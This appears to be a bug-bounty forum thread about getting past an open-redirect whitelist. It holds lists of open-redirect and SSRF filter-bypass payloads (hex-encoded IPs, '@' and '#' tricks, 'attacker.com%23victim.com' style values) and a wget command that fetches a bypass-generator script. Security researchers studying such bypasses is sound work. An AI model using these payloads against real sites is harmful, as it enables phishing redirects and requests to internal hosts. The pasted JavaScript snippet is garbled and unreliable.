I have a problem.
I can redirect the URL of the destination site.
but I can only redirect the subdomain address.
Example:
Https://bugcword.com/?redirect=https://twitter.bugcword.com
web site redirected to twitter.bugcword.com.
but if I want to redirect domain address it does not allow.
I tried every method to redirect the domain address.
Is there anyone who can help me with this?
Hi @cyberthereaper,
Although this tool is designed for bypassing SSRF filters, the techniques and tricks that the tool provides can come in handy when attempting to bypass redirect filters too: https://github.com/cujanovic/SSRF-Testing/blob/master/ip.py.
$ wget https://raw.githubusercontent.com/cujanovic/SSRF-Testing/master/ip.py
$ python ip.py 1.1.1.1 80 bugcrowd.com
Dotted hexadecimal IP Address of: http://1.1.1.1 + authentication prefix/bypass combo list
=========================================================================================================================================
http://0x1.0x1.0x1.0x1:80/
http://0x1.0x1.0x1.0x1:80?@bugcrowd.com/
http://0x1.0x1.0x1.0x1:80#@bugcrowd.com/
http://bugcrowd.com@0x1.0x1.0x1.0x1:80/
http://wEZLPZaI8zMd@0x1.0x1.0x1.0x1:80/
http://UeI9DvIdFE>H5@0x1.0x1.0x1.0x1:80/
http://wEZLPZaI8zMd@0x1.0x1.0x1.0x1:80@bugcrowd.com/
http://UeI9DvIdFE>H5@0x1.0x1.0x1.0x1:@bugcrowd.com/
http://wEZLPZaI8zMd@0x1.0x1.0x1.0x1:80+@bugcrowd.com/
http://UeI9DvIdFE>H5@0x1.0x1.0x1.0x1:+@bugcrowd.com/
http://wEZLPZaI8zMd@bugcrowd.com@0x1.0x1.0x1.0x1:80/
http://UeI9DvIdFE>H5@bugcrowd.com@0x1.0x1.0x1.0x1:80/
http://0x1.0x1.0x1.0x1:80+&@bugcrowd.com#+@bugcrowd.com/
http://bugcrowd.com+&@0x1.0x1.0x1.0x1:80#+@bugcrowd.com/
http://bugcrowd.com+&@bugcrowd.com#+@0x1.0x1.0x1.0x1:80/
http://0x1.0x1.0x1.0x1:80:80/
...
Also, some of the techniques used to exploit CORS misconfigurations described in https://www.corben.io/advanced-cors-techniques/ might help you bypass that whitelist.
That being said, if you notice that none of this works, it might be worth moving to something different and not wasting too much time. The whitelist could be designed in a way so that you can only redirect to a trusted host.
Good luck!
- Ed
hello… thank you for your answer…found these codes at the source of the page…i think i did not redirect the page because of these codes…Do you think I’m wrong? If I found the right codes, do I have a choice?
var getParameterByName = function (field, url) {
var href = url ? url : window.location.search;
field = field.replace(/[[]/g, “\[”).replace(/[]]/g, “\]”);
var regex = new RegExp("[\?&]" + field + “=([^&#]*)”),
results = regex.exec(href);
return results === null ? “” : decodeURIComponent(results[1].replace(/+/g, " "));
}
try these combination:
victim.com.attacker.com
attacker.com%2F%2Fvictim.com
attacker.com%3F.victim.com
attacker.com%23victim.com
or copy Open Redirect payload from google and use them with Burp Intruder.